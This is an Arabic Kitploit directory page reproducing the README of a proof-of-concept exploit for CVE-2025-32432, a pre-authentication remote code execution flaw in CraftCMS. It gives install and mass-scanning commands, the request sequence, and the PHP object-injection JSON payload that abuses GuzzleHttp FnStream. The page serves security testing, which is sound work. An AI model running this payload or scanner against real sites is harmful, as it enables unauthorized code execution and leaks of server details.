Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-32432 — يحتوي هذا المستودع على سكربت إثبات مفهوم لاستغلال الثغرة الأمنية CVE-2025-32432، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) قبل المصادقة تؤثر على إصدارات CraftCMS 4.x و5.x. توجد الثغرة في ميزة إنشاء التحويلات (asset transform generation) في CraftCMS. | Kitploit
أدوات/GitHubGitHub/sachinart/cve-2025-32432
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubsachinart/cve-2025-32432

CVE-2025-32432

يحتوي هذا المستودع على سكربت إثبات مفهوم لاستغلال الثغرة الأمنية CVE-2025-32432، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) قبل المصادقة تؤثر على إصدارات CraftCMS 4.x و5.x. توجد الثغرة في ميزة إنشاء التحويلات (asset transform generation) في CraftCMS.

عرض المستودع
274منذ سنة واحدةتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال ثغرة CraftCMS CVE-2025-32432 بواسطة Chirag Artani

نظرة عامة

يحتوي هذا المستودع على نص برمجي استغلالي لإثبات المفهوم لثغرة CVE-2025-32432، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) قبل المصادقة تؤثر على إصدارات CraftCMS 4.x و5.x. توجد الثغرة في ميزة توليد تحويل الأصول في CraftCMS.

يعمل هذا النص البرمجي الاستغلالي على أتمتة اكتشاف الثغرة والتحقق منها عن طريق:

  1. استخراج رموز CSRF من لوحة تحكم CraftCMS الإدارية
  2. استغلال الثغرة من خلال حقن كائن PHP
  3. التحقق من نجاح الاستغلال عن طريق استخراج معلومات النظام

إخلاء مسؤولية

⚠️ هذه الأداة مقدمة لأغراض تعليمية واختبار أمني مصرح به فقط.

استخدم هذه الأداة فقط ضد الأنظمة التي لديك إذن صريح لاختبارها. الاختبار غير المصرح به ضد الأنظمة دون إذن غير قانوني وغير أخلاقي.

الميزات

  • دعم المسح لهدف واحد وعدة أهداف (استنادًا إلى ملف)
  • إمكانية تعدد الخيوط لمسح أسرع لعدة أهداف
  • مخرجات مفصلة تتضمن اسم قاعدة البيانات ومعلومات دليل المنزل
  • إنشاء تقارير CSV للأهداف الضعيفة
  • تجاوز التحقق من SSL لاختبار الشهادات ذاتية التوقيع
  • معالجة قوية للأخطاء

التثبيت

root@kitploit:~
# Clone the repository
git clone https://github.com/Sachinart/CVE-2025-32432.git
cd CVE-2025-32432

# Install required dependencies
pip install -r requirements.txt

المتطلبات

  • Python 3.6+
  • حزم Python المطلوبة (انظر requirements.txt):
    • requests
    • beautifulsoup4
    • urllib3

الاستخدام

هدف واحد

لمسح هدف واحد:

root@kitploit:~
python3 craftcms_rce.py -u example.com

أهداف متعددة

لمسح أهداف متعددة من ملف (عنوان URL واحد لكل سطر):

root@kitploit:~
python3 craftcms_rce.py -f urls.txt -t 10

حيث -t يحدد عدد الخيوط المستخدمة (الافتراضي هو 5).

الخيارات

root@kitploit:~
-u, --url     عنوان URL واحد للاختبار
-f, --file    ملف يحتوي على عناوين URL للاختبار (واحد لكل سطر)
-t, --threads عدد الخيوط (الافتراضي: 5)
-h, --help    عرض رسالة المساعدة والخروج

المخرجات

سيقوم النص البرمجي بإخراج النتائج إلى وحدة التحكم وحفظ الأهداف الضعيفة في ملف vulnerable.txt بتنسيق CSV بالأعمدة التالية:

  • URL
  • قيمة CRAFT_DB_DATABASE (اسم قاعدة البيانات)
  • مسار دليل HOME
  • معلومات نظام أخرى

مثال على مخرجات وحدة التحكم:

root@kitploit:~
[*] Testing single target: https://example.com
[*] Starting scan with 5 threads
[+] VULNERABLE: https://example.com
    CRAFT_DB_DATABASE: example_db
    HOME Directory: /home/example

=== SCAN SUMMARY ===
Total URLs scanned: 1
Vulnerable sites: 1
Detailed results saved to vulnerable.txt

كيفية عمل الثغرة

تستغل هذه الثغرة مشكلة إلغاء تسلسل (deserialization) في CraftCMS. يقوم الاستغلال بما يلي:

  1. يُرسل طلب GET إلى /index.php?p=admin/dashboard لاسترداد رمز CSRF
  2. يُرسل طلب POST إلى /index.php?p=admin/actions/assets/generate-transform مع حمولة JSON مصممة خصيصًا
  3. تحتوي الحمولة على كائن PHP يتم إلغاء تسلسله مما يؤدي إلى تنفيذ تعليمات برمجية عشوائية عبر فئة GuzzleHttp\Psr7\FnStream
  4. يتم التحقق من نجاح الاستغلال عن طريق تنفيذ phpinfo() واستخراج معلومات نظام محددة

التفاصيل التقنية

يستغل الاستغلال إلغاء تسلسل غير آمن في عملية توليد تحويل الأصول. يسمح مسار الكود الضعيف للمهاجم بحقن كائن PHP مخصص يتم إلغاء تسلسله مما يؤدي إلى تنفيذ تعليمات برمجية عشوائية.

المكونات الرئيسية للحمولة:

root@kitploit:~
{
  "assetId": 11,
  "handle": {
    "width": 123,
    "height": 123,
    "as session": {
      "class": "craft\\behaviors\\FieldLayoutBehavior",
      "__class": "GuzzleHttp\\Psr7\\FnStream",
      "__construct()": [[]],
      "_fn_close": "phpinfo"
    }
  }
}

المساهمة

المساهمات والمشكلات وطلبات الميزات مرحب بها! لا تتردد في زيارة صفحة المشكلات.

الترخيص

هذا المشروع مرخص بموجب رخصة MIT - راجع ملف LICENSE للتفاصيل.

المراجع

  • تفاصيل CVE-2025-32432
  • إرشاد أمان CraftCMS

المؤلف

  • Nicolas Bourras (Orange Cyberdefense) - اكتشاف الثغرة الأصلي
  • Chirag Artani - مؤلف النص البرمجي الاستغلالي
تنزيل الأداة